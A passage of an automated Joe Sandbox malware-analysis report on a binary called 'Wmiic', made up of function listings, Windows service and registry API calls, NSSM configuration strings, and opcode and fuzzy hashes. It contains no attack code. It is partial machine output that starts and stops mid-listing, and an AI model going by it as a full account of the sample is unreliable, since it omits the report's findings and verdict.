                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateErrorLastOpen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2883820896-0
                                                                                                                                                                                                    • Opcode ID: 426f83eaa0c046e117805a459ac9e79b35227a8f246da0bf843b4684c48776b8
                                                                                                                                                                                                    • Instruction ID: 07820c114393a1c3651ebc684bf4408ed366b49354d521bc99e9e45516614059
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 426f83eaa0c046e117805a459ac9e79b35227a8f246da0bf843b4684c48776b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E21A176600B4186E761CF6BB89476A72A5F788BD4F584234EF88437B5CF38C811C704
                                                                                                                                                                                                    Function 000000014000EE10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(?,?,?,?,00000001400133C9), ref: 000000014000EE20
                                                                                                                                                                                                      • Part of subcall function 00000001400025F0: RegisterEventSourceW.ADVAPI32 ref: 0000000140002613
                                                                                                                                                                                                      • Part of subcall function 00000001400025F0: ReportEventW.ADVAPI32 ref: 0000000140002688
                                                                                                                                                                                                      • Part of subcall function 00000001400025F0: DeregisterEventSource.ADVAPI32 ref: 0000000140002691
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Source$DeregisterManagerOpenRegisterReport
                                                                                                                                                                                                    • String ID: ServicesActive
                                                                                                                                                                                                    • API String ID: 2921005559-3071072050
                                                                                                                                                                                                    • Opcode ID: f8b1cc4c245f662c5fbfc86ec2cd82fe25e88d529c2b183d9024c7d0f0ce16cb
                                                                                                                                                                                                    • Instruction ID: 7bf288e408de665aed5aeb23dc28e3206f15ed75b00312d32a24d07a7a484b57
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8b1cc4c245f662c5fbfc86ec2cd82fe25e88d529c2b183d9024c7d0f0ce16cb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19E0C2F07116D041FBAB9733A8957E91191530E380F88142EB6091B2E1E53DC4895700
                                                                                                                                                                                                    Function 000000014001891C Relevance: 3.1, APIs: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2310398763-0
                                                                                                                                                                                                    • Opcode ID: e66c1dd98a81f76523e4b2b39862ef8da574e8aad7a2b8f60fea7545e7802433
                                                                                                                                                                                                    • Instruction ID: cf2e94c59605c827490696988e9ebb010eeff403afd3cb9beaeed625cea3292f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e66c1dd98a81f76523e4b2b39862ef8da574e8aad7a2b8f60fea7545e7802433
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F11387272425542F726DA776902BAF6146AB8DBD4F048225BF504FBE6CF39C4014B00
                                                                                                                                                                                                    Function 0000000140020558 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,00000001,0000000140019F3F), ref: 000000014002056C
                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,00000001,0000000140019F3F), ref: 00000001400205C3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3328510275-0
                                                                                                                                                                                                    • Opcode ID: 52b48ba027309c268b512042e826b0040b0b68e810d38ab844d28889a68a6781
                                                                                                                                                                                                    • Instruction ID: 27a3e792f96817a0e8cf10094a7cce5f9e20a5dc5851357d12ae0bf73b465cf9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52b48ba027309c268b512042e826b0040b0b68e810d38ab844d28889a68a6781
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82018B32705B5085EE616F63A55539B67A0E74CFC0F4C8425FF49077A6EA3CC9C18740
                                                                                                                                                                                                    Function 000000014000BFC0 Relevance: 3.0, APIs: 2, Instructions: 42registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1151882462-0
                                                                                                                                                                                                    • Opcode ID: f126e78fb2dcacfabb8a301fae63ef6e246f4beabb4efec4ad6e6b4439e68fb8
                                                                                                                                                                                                    • Instruction ID: 83cb7a815068fcf4ab2de7cbf73c3f9a6832888872b2b956c7e89c07b6edc9bc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f126e78fb2dcacfabb8a301fae63ef6e246f4beabb4efec4ad6e6b4439e68fb8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93012B7170468042E7118B3AF450B9BA260F789BF8F584324FFAA43BE5DA3CC9414700
                                                                                                                                                                                                    Function 00000001400026B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0000000140002530: GetUserDefaultLCID.KERNELBASE(?,?,?,?,?,?,00000000,00000001400026CE,?,?,?,00000000,0000000140001065), ref: 0000000140002538
                                                                                                                                                                                                      • Part of subcall function 0000000140002530: FormatMessageW.KERNELBASE ref: 0000000140002567
                                                                                                                                                                                                      • Part of subcall function 0000000140002530: FormatMessageW.KERNEL32 ref: 0000000140002599
                                                                                                                                                                                                      • Part of subcall function 0000000140002530: GetProcessHeap.KERNEL32 ref: 00000001400025A3
                                                                                                                                                                                                      • Part of subcall function 0000000140002530: HeapAlloc.KERNEL32 ref: 00000001400025B2
                                                                                                                                                                                                      • Part of subcall function 0000000140002530: _snwprintf_s.LIBCMT ref: 00000001400025D4
                                                                                                                                                                                                    • _vfwprintf_p.LIBCMT ref: 00000001400026E1
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,0000000140001065), ref: 00000001400026E9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FormatHeapMessage$AllocDefaultFreeLocalProcessUser_snwprintf_s_vfwprintf_p
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 418798648-0
                                                                                                                                                                                                    • Opcode ID: b9e2fb73056956266d8f65f75a8af008741aaaf4afbe52a6e07819eac5454351
                                                                                                                                                                                                    • Instruction ID: 6d7d810d7111ec690abced4b0f3e6a2a606c685bad1816cb6f56e965f88532a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9e2fb73056956266d8f65f75a8af008741aaaf4afbe52a6e07819eac5454351
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FAE04F7260578042DD0ADB1779503A9A291AB8C7C1F484828BF8907755EF3CC6948740
                                                                                                                                                                                                    Function 00000001400205EC Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$CreateInformation
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1774340351-0
                                                                                                                                                                                                    • Opcode ID: edb88e91396a61cd8c355dff496fc69843bdaca4606bf3ee0219da364ff22c02
                                                                                                                                                                                                    • Instruction ID: 9ee7d56fb08d5f3afb1ad26f4d176171cdeb2e2a73566ed9e3bf0c6f6fa99c57
                                                                                                                                                                                                    • Opcode Fuzzy Hash: edb88e91396a61cd8c355dff496fc69843bdaca4606bf3ee0219da364ff22c02
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76E08675B22B9083F78ADB22E85979962A0F78C781F90502DFB49037A4DF3CC5558B00
                                                                                                                                                                                                    Function 000000014001A2E0 Relevance: 2.5, APIs: 2, Instructions: 30sleepCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • malloc.LIBCMT ref: 000000014001A2FF
                                                                                                                                                                                                      • Part of subcall function 00000001400206EC: _FF_MSGBANNER.LIBCMT ref: 000000014002071C
                                                                                                                                                                                                      • Part of subcall function 00000001400206EC: HeapAlloc.KERNEL32(?,?,00000000,000000014001A304,?,?,00000000,000000014001A895,?,?,00000000,000000014001A93F), ref: 0000000140020741
                                                                                                                                                                                                      • Part of subcall function 00000001400206EC: _errno.LIBCMT ref: 0000000140020765
                                                                                                                                                                                                      • Part of subcall function 00000001400206EC: _errno.LIBCMT ref: 0000000140020770
                                                                                                                                                                                                    • Sleep.KERNEL32(?,?,00000000,000000014001A895,?,?,00000000,000000014001A93F,?,?,?,?,?,?,00000000,000000014001C67C), ref: 000000014001A316
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$AllocHeapSleepmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 496785850-0
                                                                                                                                                                                                    • Opcode ID: d487568a586992d1fcb55698f8c4441f09e4e55957370627acfcf2ddf9cad006
                                                                                                                                                                                                    • Instruction ID: 4142fe8a63bf8884d36fe6fdc3d1457c7defd5a6f16963f854cf87769d59775e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d487568a586992d1fcb55698f8c4441f09e4e55957370627acfcf2ddf9cad006
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61F0F636205B8486EA469F17A8403AD72A1F79CBD0F140225FBA90B765CF3DCD928700
                                                                                                                                                                                                    Function 000000014001CD48 Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _flush
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1054455859-0
                                                                                                                                                                                                    • Opcode ID: 3c1e6c436a57261ec5bed7e3c6ba64f328dbb72de6e597122cdadc1df7cce470
                                                                                                                                                                                                    • Instruction ID: 3643a82b513493edc10440ee81a33d9487eb60d6f6841feaf6ae093861250207
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c1e6c436a57261ec5bed7e3c6ba64f328dbb72de6e597122cdadc1df7cce470
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FE012F3921B0487EB1E5A3290457B836A0E37DB9FF164524D7110D196D778C5D4C644

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Function 00000001400070A0 Relevance: 170.2, APIs: 63, Strings: 34, Instructions: 443memorytimeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentVariable$_snwprintf_s$Event$HeapProcessSourceTime$AllocCriticalCurrentDeregisterEnterFileRegisterReportSectionSystem
                                                                                                                                                                                                    • String ID: "%s" %s$%lu$%s (%s/%s)$2.24-101-g897c7ad$2017-04-26$64-bit$NSSM_ACTION$NSSM_APPLICATION_PID$NSSM_APPLICATION_RUNTIME$NSSM_BUILD_DATE$NSSM_COMMAND_LINE$NSSM_CONFIGURATION$NSSM_DEADLINE$NSSM_EVENT$NSSM_EXE$NSSM_EXITCODE$NSSM_EXIT_COUNT$NSSM_HOOK_VERSION$NSSM_LAST_CONTROL$NSSM_PID$NSSM_RUNTIME$NSSM_SERVICE_DISPLAYNAME$NSSM_SERVICE_NAME$NSSM_START_COUNT$NSSM_START_REQUESTED_COUNT$NSSM_THROTTLE_COUNT$NSSM_TRIGGER$NSSM_VERSION$Pre$Start$h$hook$nssm_hook$nssm_hook()
                                                                                                                                                                                                    • API String ID: 1580475628-2341226502
                                                                                                                                                                                                    • Opcode ID: 294eb9d4a23a78c2de3f36ec37dab0aad2ddc9e726d8f4d6a7593e092b17f7c3
                                                                                                                                                                                                    • Instruction ID: 1c3f5b841a22e28915dda55d46f00e8888b02ddfce4e8b72b9f71ca216febfb4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 294eb9d4a23a78c2de3f36ec37dab0aad2ddc9e726d8f4d6a7593e092b17f7c3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27323E71604A8691EB22DB22F8517DA7361F7887D4F80422AFB9D476B9DF3CCA49C710
                                                                                                                                                                                                    Function 000000014000DD40 Relevance: 72.2, APIs: 17, Strings: 24, Instructions: 491registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000003,00000000,?,00000003,00000000,0000000140010A23), ref: 000000014000DE27
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Close
                                                                                                                                                                                                    • String ID: AppAffinity$AppDirectory$AppEnvironment$AppEnvironmentExtra$AppKillProcessTree$AppNoConsole$AppParameters$AppPriority$AppRedirectHook$AppRestartDelay$AppRotateBytes$AppRotateBytesHigh$AppRotateDelay$AppRotateFiles$AppRotateOnline$AppRotateSeconds$AppStopMethodConsole$AppStopMethodSkip$AppStopMethodThreads$AppStopMethodWindow$AppThrottle$AppTimestampLog$Application$NSSM
                                                                                                                                                                                                    • API String ID: 3535843008-3506916582
                                                                                                                                                                                                    • Opcode ID: a3178ec04ad4e68e416fe25619a2ffa94c5c1b4cf00600d989723d11c9e5fa88
                                                                                                                                                                                                    • Instruction ID: c7805839bb8358a959a768a10e243be2ff9b259aeb2623d0bf795c7c7b3a558e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3178ec04ad4e68e416fe25619a2ffa94c5c1b4cf00600d989723d11c9e5fa88
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D432B1F2208AC5C5EB22DF62B4417DA77A0F788BC8F84412AFB89576A9DB3CC545C711
                                                                                                                                                                                                    Function 000000014000F500 Relevance: 72.1, APIs: 34, Strings: 7, Instructions: 330memoryregistryserviceCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$Free$Process$ErrorLastOpenService$ChangeCloseConfigHandleLocalManager_vfwprintf_p
                                                                                                                                                                                                    • String ID: %s: %s$%s: %s$%s\%s: %s$List$SYSTEM\CurrentControlSet\Control\ServiceGroupOrder$groups$set_service_dependencies()
                                                                                                                                                                                                    • API String ID: 717911963-3133791794
                                                                                                                                                                                                    • Opcode ID: 54557dc6fc8c01a7130147166d68acc7474a2c037710422b00090d6a8d766381
                                                                                                                                                                                                    • Instruction ID: d7ce32b5b10f061c7e7195f09d254de381534975a8cdc810ca296d842c87e0db
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54557dc6fc8c01a7130147166d68acc7474a2c037710422b00090d6a8d766381
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5E191B1601A4581EA22DB63B8147EA63A1FB8DBD4F448119FF5E43BB9EF38C945D700
                                                                                                                                                                                                    Function 0000000140012550 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 288serviceCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0000000140009FB0: GetConsoleWindow.KERNEL32 ref: 0000000140009FB8
                                                                                                                                                                                                      • Part of subcall function 0000000140009FB0: GetStdHandle.KERNEL32 ref: 0000000140009FC8
                                                                                                                                                                                                      • Part of subcall function 0000000140009FB0: GetProcessWindowStation.USER32 ref: 0000000140009FD3
                                                                                                                                                                                                      • Part of subcall function 0000000140002430: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,000000014000104C), ref: 0000000140002442
                                                                                                                                                                                                      • Part of subcall function 0000000140002430: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,000000014000104C), ref: 0000000140002458
                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32 ref: 000000014001296C
                                                                                                                                                                                                      • Part of subcall function 0000000140002430: TlsSetValue.KERNEL32(?,?,?,?,?,?,?,000000014000104C), ref: 0000000140002481
                                                                                                                                                                                                      • Part of subcall function 0000000140002430: GetUserDefaultLangID.KERNEL32(?,?,?,?,?,?,?,000000014000104C), ref: 0000000140002487
                                                                                                                                                                                                      • Part of subcall function 0000000140002430: FormatMessageW.KERNEL32 ref: 00000001400024B1
                                                                                                                                                                                                      • Part of subcall function 0000000140002430: FormatMessageW.KERNEL32 ref: 00000001400024DE
                                                                                                                                                                                                      • Part of subcall function 0000000140002430: _snwprintf_s.LIBCMT ref: 00000001400024FF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
